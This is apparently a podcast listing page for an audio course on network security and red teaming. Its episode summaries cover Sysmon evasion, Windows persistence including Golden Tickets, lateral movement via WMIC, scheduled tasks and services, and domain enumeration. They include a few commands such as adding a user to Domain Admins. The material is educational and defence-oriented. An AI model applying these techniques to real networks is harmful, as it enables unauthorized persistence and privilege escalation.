CyberCode Academy

CyberCode Academy
  • ٠٫٠ (٠)
  • دورات تدريبية
  • يتم التحديث يوميًا

Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.

  1. Course 17 - Computer Network Security Protocols And Techniques | Episode 1: Computer Network Security: Foundations, Core Aspects

    قبل ٢٠ ساعة

    Course 17 - Computer Network Security Protocols And Techniques | Episode 1: Computer Network Security: Foundations, Core Aspects

    In this lesson, you’ll learn about: The fundamental goals of computer network securityThe four core security properties used to protect network communicationsThe classic security model involving Alice, Bob, and EveCommon threat behaviors observed in insecure communication channelsIntroduction This lesson introduces the foundations of computer network security by explaining its core objectives and the main actors involved in secure and insecure communications. To simplify complex security concepts, a widely used abstract model is employed, featuring Alice, Bob, and Eve. This model helps students understand how legitimate communication works, how it can be attacked, and why security mechanisms are necessary. Core Aspects of Network Security Computer network security focuses on protecting information as it is exchanged between interconnected systems. It is built upon four fundamental aspects: 1. Confidentiality Confidentiality ensures that information remains private. If a sender encrypts a message, only the intended recipient should be able to decrypt and read it.Unauthorized parties should gain no meaningful information, even if they intercept the data.2. Authentication Authentication verifies the identities of communicating parties. Both the sender and receiver must confirm who they are communicating with.This prevents attackers from pretending to be trusted users or systems.3. Message Integrity (Message Authentication) Message integrity ensures that transmitted data has not been altered. The receiver must be able to detect any modification immediately.This protects against tampering, insertion, or deletion of data during transmission.4. Access and Availability Availability ensures that network services remain usable. Legitimate users must be able to access systems and services when needed.Security mechanisms should protect against disruptions that prevent normal operation.The Security Actors: Alice, Bob, and Eve To explain security threats clearly, network security often uses three symbolic characters: Alice and Bob Represent legitimate and trusted entities.They may be real users, applications, network devices, or servers.Their goal is to communicate securely and reliably.Examples include: A user accessing an online banking serviceTwo routers exchanging routing informationA client communicating with a web serverEve Represents the adversary or intruder.Eve is not a specific person, but a model for any malicious entity attempting to interfere with communication.Common Attacks Performed by Eve Eve can attempt several types of attacks on the communication channel between Alice and Bob: Interception and Eavesdropping Eve listens to the communication to obtain confidential information.This violates confidentiality.Message Manipulation Eve intercepts messages and modifies their contents.She may delete messages or inject new, fake ones.This breaks message integrity.Man-in-the-Middle (Hijacking) Eve positions herself between Alice and Bob.All communication passes through Eve without their knowledge.Eve can read, modify, or redirect messages freely.Impersonation and Spoofing Eve pretends to be Alice when communicating with Bob.Bob believes the messages originate from Alice, even though they do not.This undermines authentication.Denial of Service (DoS) Attacks Eve overwhelms Bob with excessive requests.Often combined with spoofing techniques.Bob becomes unable to respond to legitimate requests from Alice.This violates availability.Key Educational Takeaways Network security exists to protect confidentiality, integrity, authentication, and availabilityLegitimate communication must be protected from interception and manipulationAttackers exploit weaknesses in trust, identity, and visibilityThe Alice–Bob–Eve model provides a simple but powerful way to analyze security threatsUnderstanding attacker behavior is essential for designing effective defenses You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١٠ من الدقائق
  2. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 7: The Art of Evasion: Detecting and Bypassing Security with Sysmon

    قبل يوم واحد

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 7: The Art of Evasion: Detecting and Bypassing Security with Sysmon

    In this lesson, you’ll learn about: The adversarial relationship between red teams and blue teamsCore evasion philosophies used during red team engagementsHow host-based monitoring tools like Sysmon detect attacker behaviorCommon indicators defenders rely on to identify malicious activityWhy understanding detection tools is essential for both attackers and defendersOverview This lesson explores the cybersecurity “cat and mouse game” between red teamers and blue teamers. It focuses on how attackers attempt to remain stealthy, while defenders deploy monitoring tools to detect abnormal behavior. The episode moves from evasion theory to a conceptual examination of Sysmon, a widely used Windows system monitoring utility, demonstrating how detection works—and how sophisticated attackers attempt to bypass it during authorized security assessments. The goal is not exploitation, but understanding limitations, detection gaps, and defensive improvements. 1. The Red Team Mindset: Evasion and Blending In A red teamer’s objective during an engagement is not chaos, but persistence without detection. Once detected, access is often lost, limiting the value of the assessment. Environmental Awareness Effective operators must understand: What security controls are presentHow those controls collect dataWhat behaviors are considered “normal” in the environmentEvasion decisions are based on this awareness, not randomness. Primary Evasion Strategies 1. Disabling Defenses A direct but noisy approachImmediately disrupts security visibilityOften triggers alerts and manual investigationRisk: While effective short-term, it almost guarantees defender awareness. 2. Blending In Mimicking legitimate user or system behaviorUsing common protocols and expected execution patternsAligning malicious activity with typical system workflowsStrength: Reduces behavioral anomalies that monitoring tools flag. 3. Targeting Unwatched Areas Identifying security blind spotsLeveraging exclusions or limited logging scopesOperating where visibility is weakestReality: No monitoring solution observes everything equally. 2. The Blue Team Perspective: Detection with Sysmon What Sysmon Does Sysmon is a host-based monitoring tool that provides deep visibility into system activity, including: Process creation eventsParent-child process relationshipsNetwork connectionsRegistry modificationsIt does not block attacks—it records evidence. Common Indicators Defenders Look For During the demonstration, Sysmon reveals attacker behavior through patterns such as: Unusual executables placed in sensitive system directoriesRandomized file names that do not match known softwareSuspicious process chains, where core system processes launch unexpected childrenOutbound network activity from processes that normally should not communicate externallyDetection relies less on a single event and more on correlation. 3. Counter-Evasion: Understanding the Limits of Monitoring Advanced red teamers study defensive tools not to destroy them, but to understand their coverage. Why This Matters Security tools: Operate based on configurationHave exclusions for performance and noise reductionCan be misconfigured or incompleteBy understanding what is logged versus what is ignored, operators can predict detection likelihood. Key Defensive Lesson Even when a monitoring tool appears active: Logging may be incompleteVisibility may be conditionalDrivers and data sources may be disabled independentlyThis reinforces why defenders must: Verify data integrityMonitor monitoring tools themselvesAvoid assuming visibility equals coverage4. The Real Battle: Creativity and Understanding Neither red teams nor blue teams rely solely on tools. Red teams rely on understanding system behaviorBlue teams rely on pattern recognition and contextTools amplify skill—but do not replace itThe effectiveness of both sides depends on: Knowledge of operating systemsAwareness of tooling limitationsThe ability to think beyond default assumptionsEducational Analogy: Understanding Evasion Imagine a red teamer as a burglar testing a secured building: Disabling defenses is cutting the power—effective, but instantly suspiciousBlending in is wearing staff clothing and acting normalUsing blind spots is entering where cameras don’t fully coverSecurity failures aren’t always due to broken locks—but to unwatched angles. Key Ethical Takeaways Evasion techniques exist to test detection, not to evade accountabilityMonitoring tools are powerful but not omniscientDetection is about behavior, not signatures aloneUnderstanding attacker evasion improves defensive designEthical training focuses on awareness, validation, and improvement You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١٤ من الدقائق
  3. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 6: Windows Persistence Strategies: Registry, Scheduled Tasks, Services, WMI

    قبل يومين

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 6: Windows Persistence Strategies: Registry, Scheduled Tasks, Services, WMI

    In this lesson, you’ll learn about: The purpose of persistence in red team operationsCommon local Windows persistence mechanisms and how they functionEvent-driven persistence using WMIThe difference between host-level and domain-level persistenceWhy Kerberos Golden Tickets represent a critical enterprise riskOverview This lesson provides a comprehensive technical explanation of Windows persistence strategies, focusing on how attackers maintain long-term access after an initial compromise. Persistence is a post-exploitation objective that ensures access survives: System rebootsUser logoutsPassword changesPartial remediation effortsAll techniques discussed are framed within authorized red team engagements, defensive awareness training, and detection engineering contexts. 1. Local System Persistence Techniques Local persistence mechanisms ensure continued execution of malicious code on a single compromised host. 1.1 Registry Run Keys Concept Windows supports registry keys that automatically launch applications when users log in. How It Works A startup entry is added to a global registry locationThe payload executes whenever any user logs inThe method survives reboots and user changesWhy It’s Effective Simple and reliableCommonly abused by malwareOften overlooked during basic incident responseDefensive Insight Security teams should monitor: Startup registry locationsUnsigned or unusual binaries referenced by run keys1.2 Scheduled Tasks Concept Scheduled Tasks allow programs to execute automatically based on time or system conditions. How It Works A background task is created to run repeatedlyExecution can be time-based or event-basedThe task operates independently of user interactionWhy It’s Effective Blends in with legitimate administrative activityCan execute frequently to re-establish accessFlexible timing and execution contextDefensive Insight Blue teams should audit: Newly created or modified tasksTasks executing from unusual directories1.3 Windows Services (SCM) Concept Windows services start automatically when the system boots and typically run with elevated privileges. How It Works A service is configured to launch at startupExecution occurs before user loginOften runs with SYSTEM-level permissionsWhy It’s Effective Highly persistentVery powerful privilege contextSurvives reboots consistentlyDefensive Insight Detection should focus on: New or modified servicesServices running unsigned or unexpected executables1.4 WMI Event Subscriptions (Advanced Persistence) Concept Windows Management Instrumentation (WMI) supports event-driven automation, which can be abused for stealthy persistence. Architecture WMI persistence consists of three logical components: Event Filter – Watches for a specific system conditionConsumer – Defines the action to performBinding – Connects the event to the actionWhy It’s Effective No visible startup entriesNo scheduled tasks or servicesTriggers only when specific events occurDefensive Insight This is one of the hardest techniques to detect. Monitoring requires: WMI repository inspectionEvent subscription auditingBehavioral correlation2. Domain-Level Persistence: Golden Tickets Concept Golden Tickets exploit Kerberos authentication to provide permanent domain-wide access. How It Works (High-Level) The Kerberos service account secret is compromisedA forged authentication ticket is createdThe ticket grants Domain Admin privileges to any chosen identityWhy This Is Critical Access persists even if:Passwords are resetAccounts are disabledAdministrators are removedThe attacker can generate new valid credentials at willImpact This technique effectively gives an attacker: Unlimited access to the domainFull control over users, systems, and policiesA near-undetectable persistence mechanism if not monitoredDefensive Insight Mitigation requires: Rotating Kerberos service secretsMonitoring authentication anomaliesImplementing strong domain hygiene and detection toolingHost vs Domain Persistence ComparisonPersistence TypeScopeRisk LevelRegistry / TasksSingle HostMediumServicesSingle HostHighWMI SubscriptionsSingle HostHigh (Stealthy)Golden TicketsEntire DomainCritical Why Persistence Matters in Red Teaming Persistence is not about destruction—it’s about testing resilience. Professional red teams use persistence to: Measure detection and response maturityTest cleanup effectivenessIdentify gaps in monitoringImprove blue team readinessEvery persistence mechanism must also include a clean removal path. Conceptual Analogy Think of persistence as hiding spare access keys: Registry & Services → A key hidden where you check every dayScheduled Tasks → A door that unlocks automatically on a timerWMI Subscriptions → A smart sensor that opens the door only under specific conditionsGolden Tickets → Access to the locksmith’s master system that can mint new keys on demandSome keys affect one door. Others open the entire city. Key Educational Takeaways Persistence is a post-exploitation objective, not an exploitSimpler methods are more common, advanced methods are stealthierDomain-level persistence is exponentially more dangerousDetection is possible—but requires deep visibilityEthical red team operations prioritize documentation and cleanup You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١١ من الدقائق
  4. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 5: Windows Lateral Movement: Manual Execution via WMIC, Scheduled Tasks

    قبل ٣ أيام

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 5: Windows Lateral Movement: Manual Execution via WMIC, Scheduled Tasks

    In this lesson, you’ll learn about: The purpose of manual lateral movement in red team operationsWhy native Windows utilities are critical for stealth and reliabilityThree core lateral movement methodologies used in authorized engagementsPrivilege context differences between execution methodsHow these techniques relate to common automated toolsOverview This lesson delivers a technical deep dive into manual lateral movement within Windows domain environments. Lateral movement refers to the ability to pivot from one compromised system to another after obtaining elevated credentials—most commonly domain administrative access. Rather than relying on automated frameworks, this episode emphasizes manual techniques using native Windows functionality, which are: Less noisyMore flexibleHarder to detect when used responsibly in controlled testingAll techniques discussed assume explicit authorization, proper scoping, and a professional red team context. 1. Lateral Movement Using WMIC Concept WMIC (Windows Management Instrumentation Command) allows administrators to remotely interact with systems using the Windows Management Infrastructure. Methodology The attacker targets a remote host by explicitly specifying itRemote interaction is used to:Validate accessConfirm file placementTrigger execution of an existing payloadKey Characteristics Requires administrative privileges on the targetExecution occurs under the credential context of the initiating userCommonly used for:Quick pivotsTesting administrative accessLightweight remote executionOperational Insight This method is simple and effective but does not automatically grant SYSTEM-level access. The resulting execution inherits the privileges of the domain admin account used. 2. Lateral Movement Using Scheduled Tasks Concept Windows Scheduled Tasks provide a powerful mechanism to execute actions on remote systems at defined times or conditions. Methodology A payload is staged on the target systemA task is created remotely with:A one-time executionImmediate triggering behaviorExecution configured under a high-privilege accountKey Characteristics Can execute under NT AUTHORITY\SYSTEMAllows privilege escalation beyond domain adminThe “run once” approach prevents repeated executionOperational Insight This technique is widely used in red team engagements because it: Mimics legitimate administrative behaviorBlends into system management activityProvides strong control over execution timing3. Lateral Movement Using Service Control Manager (SCM) Concept The Service Control Manager manages Windows services, which inherently run with elevated privileges. Methodology A specially designed service-compatible executable is requiredThe payload is registered as a new service on the targetStarting the service triggers execution automaticallyKey Characteristics Executes as SYSTEM by defaultExplains the mechanics behind tools like PsExecRequires careful payload preparation due to service constraintsOperational Insight Because services are tightly integrated with Windows internals, this method is: Extremely powerfulHighly privilegedMore detectable if not carefully managedProfessional red teamers use this method sparingly and responsibly. Privilege Context ComparisonMethodPrivilege LevelKey Use CaseWMICDomain AdminFast pivot, low complexityScheduled TasksSYSTEMPrivilege escalation, persistenceSCMSYSTEMService-based execution, tool emulation Why Manual Lateral Movement Matters Automated tools abstract these techniques, but defenders detect tools—not concepts. Understanding manual execution: Improves adaptabilityEnables stealthier operationsAllows red teamers to troubleshoot automated failuresStrengthens blue team detection engineeringConceptual Analogy Imagine having the master key to a secured facility: WMIC is like using the internal intercom to instruct a specific room to start a taskScheduled Tasks is like setting a high-priority automated instruction that executes instantlySCM is like installing new maintenance equipment that always runs with full facility authorityEach method achieves access—but with different levels of control and visibility. Key Educational Takeaways Lateral movement depends on credentials, not exploitsNative Windows tools are powerful and flexiblePrivilege context matters more than execution successManual techniques explain how automated tools workProfessional engagements require precision, restraint, and cleanup You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١٠ من الدقائق
  5. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 4: Windows Post-Exploitation: Remote File Management and System Control

    قبل ٤ أيام

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 4: Windows Post-Exploitation: Remote File Management and System Control

    In this lesson, you’ll learn about: The role of post-exploitation in red team operationsWhy redundancy is critical for operational reliabilityMultiple ethical techniques for file handling, execution, and process controlMethods for controlled system impact and disruptionThe importance of cleanup and reversibility in professional engagementsOverview This lesson provides a technical demonstration of post-exploitation techniques used by red team professionals after initial access has been achieved. The focus is not on gaining access, but on maintaining control, executing actions reliably, and manipulating system behavior in a controlled and reversible manner. A central theme of this episode is redundancy. Professional red teamers must know multiple ways to perform the same task, ensuring mission success even if certain tools, permissions, or frameworks are unavailable. All techniques are presented in an ethical, authorized testing context, aligned with real-world red team operations and the MITRE ATT&CK framework. 1. File Transfer and Management Post-exploitation frequently requires moving tools, logs, or evidence between systems. Automated File Handling Command and Control (C2) frameworks often provide built-in file operations such as:Uploading payloadsDownloading collected dataCopying files across directories or systemsThese features simplify operations but should never be relied on exclusively. Manual File Transfer (Fallback Method) When automated tools are unavailable, red teamers can rely on:Temporary SMB shares hosted on their own systemNative Windows file copy functionalityThis approach reinforces the principle of tool independence, ensuring operations can continue using built-in system capabilities. 2. Local and Remote Process Termination Managing running processes is essential for: Removing artifactsReleasing locked filesStopping unstable or suspicious processesCleaning up after executionProcess Identification Enumerating running processes to identify:Process namesAssociated Process IDs (PIDs)Execution contextTermination Techniques Local process termination using native Windows utilitiesRemote process termination against authorized targetsAlternative approaches using Windows management interfacesRedundancy ensures that if one method fails, another can be used to achieve the same goal. 3. Execution Methods Execution techniques allow red teamers to: Launch payloadsRun administrative actionsEstablish persistenceTest detection and response mechanismsService-Based Execution Creating and starting services remotelyServices often execute with elevated privilegesCommonly used to test privilege escalation and detection logicScheduled Task Execution Creating tasks that:Run immediatelyExecute on startupTrigger at defined intervalsOften used for:Persistence testingDelayed execution scenariosRemote Process Creation Leveraging system management interfaces to:Execute files silentlyAvoid interactive sessionsTest endpoint monitoring visibility4. System Impact: Shutdown, Reboot, and Logoff This section aligns closely with MITRE ATT&CK – Impact techniques, demonstrating how system availability can be influenced during authorized engagements. Standard System Control Rebooting systemsShutting down machinesLogging users off locally or remotelyThese actions are used to: Test incident response workflowsObserve detection mechanismsEvaluate business continuity controlsAdvanced Automation Scripted actions to:Force logoffsTrigger shutdownsExecute repeated system eventsSuch techniques demonstrate how attackers could disrupt availability—but in red teaming, they are used only in controlled, pre-approved scenarios. Professional Responsibility and Cleanup A critical takeaway emphasized throughout this lesson is responsibility. Every disruptive action must have:A clear purposeAn approved scopeA documented rollback planRed teamers must always:Remove persistence mechanismsRestore system stabilityLeave the environment as they found itFailure to clean up can cause real harm, which is unacceptable in professional security testing. Conceptual Analogy Think of post-exploitation as using the remote control of a smart building: File transfer is like moving furniture between roomsKilling a process is like turning off an appliance that’s in the wayScheduled tasks are like programming lights or alarmsReboots are equivalent to cutting power to test backup systemsThe goal is observation and validation, not destruction. Key Educational Takeaways Post-exploitation is about control, not chaosRedundancy ensures operational resilienceNative system tools are as important as advanced frameworksDisruption must always be reversibleCleanup is a professional obligation, not an option You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١٥ من الدقائق
  6. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 3: Essential Windows Domain and Host Enumeration

    قبل ٥ أيام

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 3: Essential Windows Domain and Host Enumeration

    In this lesson, you’ll learn about: The purpose and importance of network enumeration in red teamingWindows Domain Enumeration techniques for situational awarenessHost Enumeration methods for analyzing a specific target systemHow user sessions, services, and processes influence attack pathsWhy continuous enumeration is critical in dynamic enterprise networksOverview This lesson provides a comprehensive guide to essential red team enumeration techniques used to gather intelligence within a Windows enterprise environment. Enumeration is a critical phase of any red team operation, as it allows security professionals to understand the structure, users, systems, and behavior of a network without relying on exploits. The lesson is divided into two main areas: Domain Enumeration – gathering network-wide intelligenceHost Enumeration – collecting detailed information from a specific systemDomain Enumeration Domain enumeration focuses on identifying high-level Active Directory information that helps red teamers understand how the environment is structured and where valuable targets exist. Identifying Domain Information Discovering the current domain name (e.g., fun.com)Identifying the Domain Controller (DC) and its IP addressConfirming domain role ownership and authentication authorityDomain Policy and Infrastructure Retrieving domain policies to understand:Password requirementsLockout thresholdsSecurity enforcement levelsEnumerating domain-joined computer hostnamesUser Session Enumeration One of the most critical objectives of domain enumeration is identifying logged-in users, since credentials and tokens may reside in memory. Techniques demonstrated include: Listing users logged into all domain computersIdentifying privileged accounts logged into sensitive systems (e.g., administrators on the domain controller)Detecting regular users logged into workstationsNarrowing enumeration to a specific target host to identify active sessionsThis information is highly time-sensitive, as logged-in users can change frequently. Host Enumeration Host enumeration focuses on gathering deep, system-level intelligence from a specific target machine once access has been obtained. Basic System Information HostnameOperating system version (e.g., Windows 10 Enterprise)System architecture (x64 / x86)Domain membershipInstalled hotfixes and patch levelsCurrent User Intelligence Logged-in usernameUser Security Identifier (SID)Important for advanced techniques such as ticket-based attacksGroup membershipsAssigned user privilegesLocal Privilege Analysis Enumerating members of the local administrators groupIdentifying misconfigurations or excessive privilegesService and Process Enumeration Understanding what is running on a system reveals potential attack surfaces and persistence opportunities. Services Listing running servicesIdentifying startup servicesAnalyzing service state and startup modeDetecting services running with elevated privilegesPorts and Processes Enumerating open and listening portsIdentifying processes bound to specific portsMapping processes to:Process IDsExecutable namesFull file system pathsThis helps determine whether a service is custom, outdated, or potentially vulnerable. Application and File System Enumeration Installed Applications Listing installed software (e.g., packet analyzers like Wireshark)Identifying tools that may indicate:Developer systemsAdmin workstationsSecurity monitoring presenceFile System Analysis Recursively searching the file system for files containing specific textLocating files by name (e.g., flags or configuration files)Identifying hidden files and directoriesThese techniques help uncover credentials, scripts, backups, or sensitive data. Why Enumeration Is Critical Network environments are dynamicLogged-in users change constantlyServices may restart or moveNew systems may appear or disappearBecause of this, enumeration is not a one-time activity—it must be continuous throughout a red team operation. Key Educational Takeaways Enumeration builds context, not exploitsLogged-in users often matter more than vulnerabilitiesPrivileges and services define real attack pathsNative system tools provide powerful visibilityEffective red teaming depends on accurate, up-to-date intelligence You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١٢ من الدقائق
  7. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 2: Essential Command Line Administration: Linux, Windows, Account Management

    قبل ٦ أيام

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 2: Essential Command Line Administration: Linux, Windows, Account Management

    In this lesson, you’ll learn about: Essential Linux command-line administration basicsCore Windows command-line networking and system commandsHow to navigate, inspect, and manage files on both platformsPractical Windows domain user and group managementWhy command-line proficiency is critical for security professionalsOverview This lesson provides a foundational overview of essential command-line administration techniques used in both Linux and Windows environments. These skills are fundamental for cybersecurity professionals, system administrators, and red team members, as many security operations rely on native command-line utilities rather than graphical interfaces. The lesson concludes with Windows domain account management, an important topic for understanding enterprise environments. Linux Administration Commands The first segment introduces commonly used Linux commands within Kali Linux, focusing on basic system interaction and networking awareness. File System and Directory Management Navigating directories using cdListing directory contents using lsCreating directories using mkdirCreating files and writing content using echoViewing file contents using catRemoving files using rmRecursively listing directory contents using ls -rNetworking and Interface Management Viewing network interface information using:ifconfigip a (modern replacement)Viewing routing information using:ip rnetstat -rnRestarting networking services using:service networking restartManually disabling and enabling interfaces using:ifconfig eth0 downifconfig eth0 upHelp and Documentation Using the --help flag to view command optionsUsing the man command to read full manual pages and understand command parametersThis section emphasizes learning how to explore command capabilities independently, a critical skill in real-world environments. Windows Administration Commands The second segment focuses on Windows command-line administration, helping students become comfortable working with Windows systems without relying on graphical tools. System and Network Information hostname – displays the computer nameping – checks network connectivity using ICMP packetsDemonstrated with the loopback addressUsing -n to limit the number of packetsipconfig /all – displays detailed network configurationnslookup – resolves domain names to IP addressesnetstat -nao – shows active connections, listening ports, and process IDsroute print – displays the routing tablearp -a – shows IP-to-MAC address mappingsFile and Directory Management Listing directory contents using dirNavigating directories using cdCreating files using echoViewing file contents using typeCommand Help and Error Handling Using /? to display command usage and parametersUsing net help message to translate Windows error codes into readable messagesThis section highlights how attackers and defenders alike rely heavily on native Windows tools. Windows Domain Account Management The final segment introduces command-line management of users and groups in a Windows domain, a crucial concept in enterprise security environments. User and Group Enumeration net user /domainChecks user statusIdentifies whether the account is activeConfirms group memberships (e.g., domain admin)net users /domainLists all domain usersnet group /domainLists all domain groupsnet group /domainDisplays users belonging to a specific groupManaging Domain Privileges Adding a user to domain administrators:net group domain admins /add /domainRemoving a user from domain administrators:Using the /delete parameterActivating a disabled domain account:net user /active:yes /domainThese commands demonstrate how domain permissions are controlled and why privileged access must be carefully protected. WMIC as an Alternative wmic group list briefwmic user account list briefWMIC provides a concise way to list users and groups and is often used for quick reconnaissance and administration. Key Educational Takeaways Command-line tools exist on every system and are powerful by designMany security operations depend on native utilities rather than exploitsUnderstanding system administration improves both offensive and defensive skillsDomain environments require careful privilege managementStrong visibility and auditing are essential to prevent misuse You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١١ من الدقائق
  8. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 1: Introduction to Red Teaming: Concepts, Tools, and Tactics

    ٢٩‏/١٢‏/٢٠٢٥

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 1: Introduction to Red Teaming: Concepts, Tools, and Tactics

    In this lesson, you’ll learn about: The purpose and mindset of red teaming in cybersecurityThe difference between red teams and blue teamsHow the MITRE ATT&CK framework structures real-world attacksCore Windows command-line environments used in security operationsThe role of Command and Control (C2) frameworks in post-exploitationWidely used red team and post-exploitation analysis toolsThe concept behind payload handling and controlled demonstrationsIntroduction to Red Teaming This lesson provides a comprehensive introduction to red teaming, an adversarial security discipline where professionals simulate real-world attackers to evaluate and strengthen an organization’s defenses. Red teaming goes beyond simple vulnerability scanning and focuses on realistic attack scenarios, long-term access, and stealth. Red teaming is conducted ethically and legally within defined scopes to help organizations understand how attackers think, move, and persist inside networks. Red Team vs. Blue Team Red TeamSimulates real attackersAttempts to bypass defensesIdentifies weaknesses in people, processes, and technologyRequires creativity, research skills, and deep technical knowledgeBlue TeamDefends the organizationMonitors logs (firewalls, IDS, IPS, systems, networks)Detects suspicious activityResponds to and mitigates attacksThe interaction between red and blue teams improves overall security posture through continuous testing and feedback. MITRE ATT&CK Framework The MITRE ATT&CK framework is a globally recognized knowledge base documenting adversary behavior based on real-world incidents. Key characteristics: Organized into tactics (the attacker’s goal)Techniques explain how goals are achievedProcedures describe real attacks observed in the wildStructured into 12 tactical columns, covering the full attack lifecycleSecurity teams use ATT&CK to: Understand attacker behaviorMap defenses to known techniquesImprove detection and response strategiesEssential Windows Command-Line Environments Red teamers and defenders must understand native Windows tools because attackers often abuse legitimate utilities. Command Prompt (CMD) Traditional Windows command-line interpreterUsed for file management, networking, and basic administrationSupports batch scriptingPowerShell Advanced command-line and scripting environmentUses powerful commandletsEnables automation and deep system managementSupports aliases (e.g., ls) for ease of useWMIC (Windows Management Instrumentation Command Line) Interface for interacting with WMICan query system informationManage processes and configurationsWorks locally or remotelyScheduled Tasks Used to automate execution of programs or scriptsCan run tasks at specific times or eventsOften abused for persistenceService Control Manager (SCM) Managed via SC.exeControls Windows servicesCan create, modify, start, and stop servicesHigh-risk if abused due to elevated privilegesCommand and Control (C2) Frameworks C2 frameworks allow attackers—and red teamers in controlled exercises—to manage compromised systems remotely after initial access. Capabilities typically include: Executing commands remotelyData exfiltrationKeylogging and screen captureLateral movement automationCommonly referenced frameworks: Cobalt Strike (commercial, widely used)Covenant (free, .NET-based)Empire (PowerShell-based, no longer maintained)Red teamers often modify default C2 behaviors to evade detection and avoid signature-based defenses such as IDS and IPS. Advanced Red Team and Post-Exploitation Tools PowerSploit Collection of PowerShell modulesCovers enumeration, privilege escalation, persistence, and evasionIncludes tools like PowerUpPowerView Focuses on Active Directory reconnaissanceGathers information about users, groups, trusts, and permissionsHelps build situational awareness in domain environmentsBloodHound Visualizes Active Directory relationshipsUses a graph database (Neo4j)Identifies privilege escalation pathsShows how a standard user could reach domain admin accessMimikatz Known for credential extractionCan retrieve password hashes and credentials from memoryDemonstrates weaknesses in credential handlingEmphasizes the importance of modern defensive controlsImpacket Python-based toolkit for network protocol interactionSupports authentication attacks and remote execution techniquesUseful for understanding how Windows authentication can be abusedMetasploit Payload Handling (Conceptual Demonstration) The episode concludes with a controlled demonstration explaining how red teamers: Configure listenersGenerate payloads for testing purposesEstablish sessions on target systems within legal scopesThis section is intended to help students understand post-exploitation workflows, not to encourage misuse. Emphasis is placed on lab environments and authorization. Key Ethical and Defensive Takeaways Red teaming exists to improve security, not harm systemsMany attacks abuse legitimate system tools rather than exploitsUnderstanding attacker techniques strengthens defense strategiesFrameworks like MITRE ATT&CK bridge offense and defenseVisibility, logging, and behavior-based detection are critical You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    ١٥ من الدقائق
مشاهدة الكل (١٠٨)

حول

Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.

المعلومات

  • صناع العمل
    CyberCode Academy
  • سنوات النشاط
    ٢٠٢٥ - ٢٠٢٦
  • الحلقات
    ١٠٨
  • التقييم
    ملائم
  • حقوق النشر
    © Copyright CyberCode Academy
  • موقع البرنامج على الويب
    CyberCode Academy